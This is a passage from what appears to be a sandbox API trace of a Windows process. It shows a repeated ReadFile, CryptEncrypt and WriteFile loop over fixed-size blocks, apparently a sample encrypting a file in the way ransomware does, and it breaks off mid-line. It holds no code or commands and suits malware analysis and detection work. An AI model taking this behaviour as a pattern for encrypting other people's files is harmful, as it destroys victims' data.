[0280.978] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.978] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.978] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.978] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.978] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.978] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.978] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.978] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.978] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.978] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.979] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.979] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.979] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.979] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.979] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.979] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.979] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.979] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.979] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.979] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.979] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.979] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.979] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.980] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.980] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.980] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.980] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.980] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.980] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.980] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.980] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.980] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.980] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.980] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.980] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.980] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.981] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.981] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.981] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.981] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.981] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.981] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.981] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.981] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.981] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.981] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.981] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.981] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.981] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.981] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.982] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.982] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.982] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.982] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.982] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.982] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.982] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.982] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.982] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.982] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.982] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.982] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.983] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.983] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.983] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.983] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.983] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.983] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.983] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.983] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.983] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.983] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.983] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.983] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.983] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.984] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.984] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.984] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.984] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.984] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.984] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.984] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.984] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.984] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.984] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.985] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.985] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.985] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.985] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.985] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.985] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.985] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.985] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.985] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.985] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.985] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.985] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.985] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.986] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.986] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, 